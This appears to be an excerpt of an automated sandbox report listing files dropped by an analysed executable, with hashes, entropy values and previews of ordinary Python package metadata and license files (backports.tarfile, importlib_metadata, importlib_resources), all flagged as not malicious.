                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):12
                                                                                                                                                                                                                              Entropy (8bit):3.084962500721156
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:5EEln:aM
                                                                                                                                                                                                                              MD5:C3FBD7931840D987F261BEBA8C77C4D2
                                                                                                                                                                                                                              SHA1:F7EE740BCB5C39966173CC377817A157D55844F7
                                                                                                                                                                                                                              SHA-256:0337E180A292F04740C16513485F2681E5506D7398F64A241C1EA44AAC30AAED
                                                                                                                                                                                                                              SHA-512:E1FA2DE0EE416AE68C57A0173C82D42A8F24DDD1E5143A1B76A3743B5EC3DDF11FB3950F27469D3D8FCAC4958CE267A7321D2F888671EDD7C2E95D0F3F8F7455
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:autocommand.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4
                                                                                                                                                                                                                              Entropy (8bit):1.5
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Mn:M
                                                                                                                                                                                                                              MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                              SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                              SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                              SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:pip.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1023
                                                                                                                                                                                                                              Entropy (8bit):5.059832621894572
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:OrmJHcwH0MP3gt8Hw1hj9QHOsUv4eOk4/+/m3oqMSFJ:OaJ8YHvEH5QHOs5exm3oEFJ
                                                                                                                                                                                                                              MD5:141643E11C48898150DAA83802DBC65F
                                                                                                                                                                                                                              SHA1:0445ED0F69910EEAEE036F09A39A13C6E1F37E12
                                                                                                                                                                                                                              SHA-256:86DA0F01AEAE46348A3C3D465195DC1CECCDE79F79E87769A64B8DA04B2A4741
                                                                                                                                                                                                                              SHA-512:EF62311602B466397BAF0B23CACA66114F8838F9E78E1B067787CEB709D09E0530E85A47BBCD4C5A0905B74FDB30DF0CC640910C6CC2E67886E5B18794A3583F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to.deal in the Software without restriction, including without limitation the.rights to use, copy, modify, merge, publish, distribute, sublicense, and/or.sell copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING.FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEA
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2020
                                                                                                                                                                                                                              Entropy (8bit):5.0469065437932175
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:DfdqaaC3P1xe9okGw1w8wQwywbM0kvsJib0ts++kv0gMzvy0htC+heU01:DfdqaaC/12G2bHZokO+/36
                                                                                                                                                                                                                              MD5:18B352E2051962B9F65C33BC651426BF
                                                                                                                                                                                                                              SHA1:3DD8D93CF7695D1C9D7574751AB5B0DEE5DD7F9A
                                                                                                                                                                                                                              SHA-256:8215C54EAD77D9DC5A108A25C6BDC72B5999AA6F62C9499A440359412AFA5A51
                                                                                                                                                                                                                              SHA-512:D966BC2899079C0D9AC763C96EA59A550E00A54BDCEEB6D96B0A8CAA9F6A1C408E7E3946915432978EDE9EDF669EEC68035A55B094B69671A28428458760D99E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Metadata-Version: 2.1.Name: backports.tarfile.Version: 1.2.0.Summary: Backport of CPython tarfile module.Author-email: "Jason R. Coombs" <jaraco@jaraco.com>.Project-URL: Homepage, https://github.com/jaraco/backports.tarfile.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: MIT License.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3 :: Only.Requires-Python: >=3.8.Description-Content-Type: text/x-rst.License-File: LICENSE.Provides-Extra: docs.Requires-Dist: sphinx >=3.5 ; extra == 'docs'.Requires-Dist: jaraco.packaging >=9.3 ; extra == 'docs'.Requires-Dist: rst.linker >=1.9 ; extra == 'docs'.Requires-Dist: furo ; extra == 'docs'.Requires-Dist: sphinx-lint ; extra == 'docs'.Provides-Extra: testing.Requires-Dist: pytest !=8.1.*,>=6 ; extra == 'testing'.Requires-Dist: pytest-checkdocs >=2.4 ; extra == 'testing'.Requires-Dist: pytest-cov ; extra == 'testing
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:CSV text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1360
                                                                                                                                                                                                                              Entropy (8bit):5.753738299642538
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:U6rn/2zDJ6rvbqfuG6rJnB6rU6rEsJYB6rXamx6rlCHmTKjaQliwxJlp5DQljQls:NnuXIzUurJwN5JjfAlqYK9liSlp5DQlP
                                                                                                                                                                                                                              MD5:CF347AE8E31132435B127226F358F8CD
                                                                                                                                                                                                                              SHA1:2C857B300638FF291651234BBB2C077BEEF494E4
                                                                                                                                                                                                                              SHA-256:258A1F1C849E1175069A55A5D6CE357AFDD04E34CD5DE27093E4ACEC7A9D2CE1
                                                                                                                                                                                                                              SHA-512:2A46C7FDFA2F9883BB1D761646B33BE9CE7B07280A5BF38992C1C84AB0449944EB0CAF34620CCC82DDBBC193F0D54AE67797D97863F70CA0C24EE55A3B401F9C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:backports.tarfile-1.2.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..backports.tarfile-1.2.0.dist-info/LICENSE,sha256=htoPAa6uRjSKPD1GUZXcHOzN55956HdppkuNoEsqR0E,1023..backports.tarfile-1.2.0.dist-info/METADATA,sha256=ghXFTq132dxaEIolxr3HK1mZqm9iyUmaRANZQSr6WlE,2020..backports.tarfile-1.2.0.dist-info/RECORD,,..backports.tarfile-1.2.0.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..backports.tarfile-1.2.0.dist-info/WHEEL,sha256=GJ7t_kWBFywbagK5eo9IoUwLW6oyOeTKmQ-9iHFVNxQ,92..backports.tarfile-1.2.0.dist-info/top_level.txt,sha256=cGjaLMOoBR1FK0ApojtzWVmViTtJ7JGIK_HwXiEsvtU,10..backports/__init__.py,sha256=iOEMwnlORWezdO8-2vxBIPSR37D7JGjluZ8f55vzxls,81..backports/__pycache__/__init__.cpython-312.pyc,,..backports/tarfile/__init__.py,sha256=Pwf2qUIfB0SolJPCKcx3vz3UEu_aids4g4sAfxy94qg,108491..backports/tarfile/__main__.py,sha256=Yw2oGT1afrz2eBskzdPYL8ReB_3liApmhFkN2EbDmc4,59..backports/tarfile/__pycache__/__init__.cpython-312.pyc,,..back
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):92
                                                                                                                                                                                                                              Entropy (8bit):4.812622295095324
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:RtEeX7MWcSlVlFxP+tPCCfA5S:RtBMwlVTxWBBf
                                                                                                                                                                                                                              MD5:43136DDE7DD276932F6197BB6D676EF4
                                                                                                                                                                                                                              SHA1:6B13C105452C519EA0B65AC1A975BD5E19C50122
                                                                                                                                                                                                                              SHA-256:189EEDFE4581172C1B6A02B97A8F48A14C0B5BAA3239E4CA990FBD8871553714
                                                                                                                                                                                                                              SHA-512:E7712BA7D36DEB083EBCC3B641AD3E7D19FB071EE64AE3A35AD6A50EE882B20CD2E60CA1319199DF12584FE311A6266EC74F96A3FB67E59F90C7B5909668AEE1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Wheel-Version: 1.0.Generator: bdist_wheel (0.43.0).Root-Is-Purelib: true.Tag: py3-none-any..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):10
                                                                                                                                                                                                                              Entropy (8bit):3.321928094887362
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:21v:ev
                                                                                                                                                                                                                              MD5:9BA458821AD258B6EF62B47E91302982
                                                                                                                                                                                                                              SHA1:9EDB9E6BA5C4001CE2FCCF328739292404EA9604
                                                                                                                                                                                                                              SHA-256:7068DA2CC3A8051D452B4029A23B73595995893B49EC91882BF1F05E212CBED5
                                                                                                                                                                                                                              SHA-512:3A296E5DADD5B406330BA088BFED33BE6960F8FF42DB6651E185FF14F2272FC819EF520D1A15BC40DA4E20B9CA0E5D79170EDF33F3D50937C7FBEDB338CAC730
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:backports.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4
                                                                                                                                                                                                                              Entropy (8bit):1.5
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Mn:M
                                                                                                                                                                                                                              MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                              SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                              SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                              SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:pip.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):11358
                                                                                                                                                                                                                              Entropy (8bit):4.4267168336581415
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:nU6G5KXSD9VYUKhu1JVF9hFGvV/QiGkS594drFjuHYx5dvTrLh3kTSEn7HbHR:U9vlKM1zJlFvmNz5VrlkTS07Ht
                                                                                                                                                                                                                              MD5:3B83EF96387F14655FC854DDC3C6BD57
                                                                                                                                                                                                                              SHA1:2B8B815229AA8A61E483FB4BA0588B8B6C491890
                                                                                                                                                                                                                              SHA-256:CFC7749B96F63BD31C3C42B5C471BF756814053E847C10F3EB003417BC523D30
                                                                                                                                                                                                                              SHA-512:98F6B79B778F7B0A15415BD750C3A8A097D650511CB4EC8115188E115C47053FE700F578895C097051C9BC3DFB6197C2B13A15DE203273E1A3218884F86E90E8
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:. Apache License. Version 2.0, January 2004. http://www.apache.org/licenses/.. TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION.. 1. Definitions... "License" shall mean the terms and conditions for use, reproduction,. and distribution as defined by Sections 1 through 9 of this document... "Licensor" shall mean the copyright owner or entity authorized by. the copyright owner that is granting the License... "Legal Entity" shall mean the union of the acting entity and all. other entities that control, are controlled by, or are under common. control with that entity. For the purposes of this definition,. "control" means (i) the power, direct or indirect, to cause the. direction or management of such entity, whether by contract or. otherwise, or (ii) ownership of fifty percent (50%) or more of the. outstanding shares, or (iii) beneficial own
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4648
                                                                                                                                                                                                                              Entropy (8bit):5.006900644756252
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:Dx2ZSaCSmS8R902Vpnu386eLQ9Ac+fFZpDN00x2jZ2SBXZJSwTE:9Smzf02Vpnu386mQ9B+TP0vJHJSwTE
                                                                                                                                                                                                                              MD5:98ABEAACC0E0E4FC385DFF67B607071A
                                                                                                                                                                                                                              SHA1:E8C830D8B0942300C7C87B3B8FD15EA1396E07BD
                                                                                                                                                                                                                              SHA-256:6A7B90EFFEE1E09D5B484CDF7232016A43E2D9CC9543BCBB8E494B1EC05E1F59
                                                                                                                                                                                                                              SHA-512:F1D59046FFA5B0083A5259CEB03219CCDB8CC6AAC6247250CBD83E70F080784391FCC303F7630E1AD40E5CCF5041A57CB9B68ADEFEC1EBC6C31FCF7FFC65E9B7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Metadata-Version: 2.1.Name: importlib_metadata.Version: 8.0.0.Summary: Read metadata from Python packages.Author-email: "Jason R. Coombs" <jaraco@jaraco.com>.Project-URL: Source, https://github.com/python/importlib_metadata.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: Apache Software License.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3 :: Only.Requires-Python: >=3.8.Description-Content-Type: text/x-rst.License-File: LICENSE.Requires-Dist: zipp >=0.5.Requires-Dist: typing-extensions >=3.6.4 ; python_version < "3.8".Provides-Extra: doc.Requires-Dist: sphinx >=3.5 ; extra == 'doc'.Requires-Dist: jaraco.packaging >=9.3 ; extra == 'doc'.Requires-Dist: rst.linker >=1.9 ; extra == 'doc'.Requires-Dist: furo ; extra == 'doc'.Requires-Dist: sphinx-lint ; extra == 'doc'.Requires-Dist: jaraco.tidelift >=1.4 ; extra == 'doc'.Provides-Extra: perf.Requires-D
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:CSV text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2518
                                                                                                                                                                                                                              Entropy (8bit):5.6307766747793275
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:UnuXTg06U5J/Vw9l/gfNX7/XzBk9pvJq/fwJOfYrBfnJ/V0XJnzN/3WJV:bXzP/EgdzzBkDJsoIYrBfJ/CXNz9qV
                                                                                                                                                                                                                              MD5:EB513CAFA5226DDA7D54AFDCC9AD8A74
                                                                                                                                                                                                                              SHA1:B394C7AEC158350BAF676AE3197BEF4D7158B31C
                                                                                                                                                                                                                              SHA-256:0D8D3C6EEB9EBBE86CAC7D60861552433C329DA9EA51248B61D02BE2E5E64030
                                                                                                                                                                                                                              SHA-512:A0017CFAFF47FDA6067E3C31775FACEE4728C3220C2D4BD70DEF328BD20AA71A343E39DA15CD6B406F62311894C518DFCF5C8A4AE6F853946F26A4B4E767924E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:importlib_metadata-8.0.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..importlib_metadata-8.0.0.dist-info/LICENSE,sha256=z8d0m5b2O9McPEK1xHG_dWgUBT6EfBDz6wA0F7xSPTA,11358..importlib_metadata-8.0.0.dist-info/METADATA,sha256=anuQ7_7h4J1bSEzfcjIBakPi2cyVQ7y7jklLHsBeH1k,4648..importlib_metadata-8.0.0.dist-info/RECORD,,..importlib_metadata-8.0.0.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..importlib_metadata-8.0.0.dist-info/WHEEL,sha256=mguMlWGMX-VHnMpKOjjQidIo1ssRlCFu4a4mBpz1s2M,91..importlib_metadata-8.0.0.dist-info/top_level.txt,sha256=CO3fD9yylANiXkrMo4qHLV_mqXL2sC5JFKgt1yWAT-A,19..importlib_metadata/__init__.py,sha256=tZNB-23h8Bixi9uCrQqj9Yf0aeC--Josdy3IZRIQeB0,33798..importlib_metadata/__pycache__/__init__.cpython-312.pyc,,..importlib_metadata/__pycache__/_adapters.cpython-312.pyc,,..importlib_metadata/__pycache__/_collections.cpython-312.pyc,,..importlib_metadata/__pycache__/_compat.cpython-312.pyc,,..importlib_metadata/__pycac
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):91
                                                                                                                                                                                                                              Entropy (8bit):4.687870576189661
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:RtEeXMRYFAVLMvhRRP+tPCCfA5S:RtC1VLMvhjWBBf
                                                                                                                                                                                                                              MD5:7D09837492494019EA51F4E97823D79F
                                                                                                                                                                                                                              SHA1:7829B4324BB542799494131A270EC3BDAD4DEDEF
                                                                                                                                                                                                                              SHA-256:9A0B8C95618C5FE5479CCA4A3A38D089D228D6CB1194216EE1AE26069CF5B363
                                                                                                                                                                                                                              SHA-512:A0063220ECDD22C3E735ACFF6DE559ACF3AC4C37B81D37633975A22A28B026F1935CD1957C0FF7D2ECC8B7F83F250310795EECC5273B893FFAB115098F7B9C38
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Wheel-Version: 1.0.Generator: setuptools (70.1.1).Root-Is-Purelib: true.Tag: py3-none-any..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):19
                                                                                                                                                                                                                              Entropy (8bit):3.536886723742169
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:JSej0EBERG:50o4G
                                                                                                                                                                                                                              MD5:A24465F7850BA59507BF86D89165525C
                                                                                                                                                                                                                              SHA1:4E61F9264DE74783B5924249BCFE1B06F178B9AD
                                                                                                                                                                                                                              SHA-256:08EDDF0FDCB29403625E4ACCA38A872D5FE6A972F6B02E4914A82DD725804FE0
                                                                                                                                                                                                                              SHA-512:ECF1F6B777970F5257BDDD353305447083008CEBD8E5A27C3D1DA9C7BDC3F9BF3ABD6881265906D6D5E11992653185C04A522F4DB5655FF75EEDB766F93D5D48
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:importlib_metadata.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4
                                                                                                                                                                                                                              Entropy (8bit):1.5
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Mn:M
                                                                                                                                                                                                                              MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                              SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                              SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                              SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:pip.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):11358
                                                                                                                                                                                                                              Entropy (8bit):4.4267168336581415
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:nU6G5KXSD9VYUKhu1JVF9hFGvV/QiGkS594drFjuHYx5dvTrLh3kTSEn7HbHR:U9vlKM1zJlFvmNz5VrlkTS07Ht
                                                                                                                                                                                                                              MD5:3B83EF96387F14655FC854DDC3C6BD57
                                                                                                                                                                                                                              SHA1:2B8B815229AA8A61E483FB4BA0588B8B6C491890
                                                                                                                                                                                                                              SHA-256:CFC7749B96F63BD31C3C42B5C471BF756814053E847C10F3EB003417BC523D30
                                                                                                                                                                                                                              SHA-512:98F6B79B778F7B0A15415BD750C3A8A097D650511CB4EC8115188E115C47053FE700F578895C097051C9BC3DFB6197C2B13A15DE203273E1A3218884F86E90E8
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:. Apache License. Version 2.0, January 2004. http://www.apache.org/licenses/.. TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION.. 1. Definitions... "License" shall mean the terms and conditions for use, reproduction,. and distribution as defined by Sections 1 through 9 of this document... "Licensor" shall mean the copyright owner or entity authorized by. the copyright owner that is granting the License... "Legal Entity" shall mean the union of the acting entity and all. other entities that control, are controlled by, or are under common. control with that entity. For the purposes of this definition,. "control" means (i) the power, direct or indirect, to cause the. direction or management of such entity, whether by contract or. otherwise, or (ii) ownership of fifty percent (50%) or more of the. outstanding shares, or (iii) beneficial own
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3944
                                                                                                                                                                                                                              Entropy (8bit):5.015824473130961
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:DHxQuiTaCP1nTGDbHRbnzQWHaiQq+fT5lWp8sSwTW:2PP9GDbHRbnp+rapPSwTW
                                                                                                                                                                                                                              MD5:C3EB48CD13B50DDED7CD524E1E9DD4CE
                                                                                                                                                                                                                              SHA1:7C9B0B50D0E667825DAB09902AD8376A5F2945B6
                                                                                                                                                                                                                              SHA-256:83878CD8BB8BD0E89971454D0F4AB00C9529136F603AFB4EDC148F5D36CEF459
                                                                                                                                                                                                                              SHA-512:056EBC250B7E82F91B5C5E96B1293F24D5E917E06846A9716A4D05B47C30FEB3781E439C77876CF7D8620BEBAA4A253039CA8DF122283DE304992E340F4DE8BF
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Metadata-Version: 2.1.Name: importlib_resources.Version: 6.4.0.Summary: Read resources from Python packages.Home-page: https://github.com/python/importlib_resources.Author: Barry Warsaw.Author-email: barry@python.org.Project-URL: Documentation, https://importlib-resources.readthedocs.io/.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: Apache Software License.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3 :: Only.Requires-Python: >=3.8.License-File: LICENSE.Requires-Dist: zipp >=3.1.0 ; python_version < "3.10".Provides-Extra: docs.Requires-Dist: sphinx >=3.5 ; extra == 'docs'.Requires-Dist: sphinx <7.2.5 ; extra == 'docs'.Requires-Dist: jaraco.packaging >=9.3 ; extra == 'docs'.Requires-Dist: rst.linker >=1.9 ; extra == 'docs'.Requires-Dist: furo ; extra == 'docs'.Requires-Dist: sphinx-lint ; extra == 'docs'.Requires-Dist: jaraco.tidelift >=1.4 ; ext
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:CSV text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7620
                                                                                                                                                                                                                              Entropy (8bit):5.560551717923108
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:lX7qdX7ZgsP7JtILSVAn5V26+XuVYmBXx:lX7wX7ZBP7ELSVAni6+iBh
                                                                                                                                                                                                                              MD5:67F5E26385B6BDCF2236A005A2D2BA32
                                                                                                                                                                                                                              SHA1:3DCD8685638A90D121FD484138AFCAC9775E5D66
                                                                                                                                                                                                                              SHA-256:967DD56FEEA143F1D2C4E98AC1F937C055E61C9AA0425146D55F7AD7C82510FA
                                                                                                                                                                                                                              SHA-512:30B5812E930A00A476E570EBCC4611D54C911A8B1E4646949A887F551FC5ABDC933311A554B197C602F0DA7626DFE8877A3F267EFBC6D724E24A3E9B5FCC2E30
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:importlib_resources-6.4.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..importlib_resources-6.4.0.dist-info/LICENSE,sha256=z8d0m5b2O9McPEK1xHG_dWgUBT6EfBDz6wA0F7xSPTA,11358..importlib_resources-6.4.0.dist-info/METADATA,sha256=g4eM2LuL0OiZcUVND0qwDJUpE29gOvtO3BSPXTbO9Fk,3944..importlib_resources-6.4.0.dist-info/RECORD,,..importlib_resources-6.4.0.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..importlib_resources-6.4.0.dist-info/WHEEL,sha256=GJ7t_kWBFywbagK5eo9IoUwLW6oyOeTKmQ-9iHFVNxQ,92..importlib_resources-6.4.0.dist-info/top_level.txt,sha256=fHIjHU1GZwAjvcydpmUnUrTnbvdiWjG4OEVZK8by0TQ,20..importlib_resources/__init__.py,sha256=uyp1kzYR6SawQBsqlyaXXfIxJx4Z2mM8MjmZn8qq2Gk,505..importlib_resources/__pycache__/__init__.cpython-312.pyc,,..importlib_resources/__pycache__/_adapters.cpython-312.pyc,,..importlib_resources/__pycache__/_common.cpython-312.pyc,,..importlib_resources/__pycache__/_itertools.cpython-312.pyc,,..importlib_resource
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):92
                                                                                                                                                                                                                              Entropy (8bit):4.812622295095324
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:RtEeX7MWcSlVlFxP+tPCCfA5S:RtBMwlVTxWBBf
                                                                                                                                                                                                                              MD5:43136DDE7DD276932F6197BB6D676EF4
                                                                                                                                                                                                                              SHA1:6B13C105452C519EA0B65AC1A975BD5E19C50122
                                                                                                                                                                                                                              SHA-256:189EEDFE4581172C1B6A02B97A8F48A14C0B5BAA3239E4CA990FBD8871553714
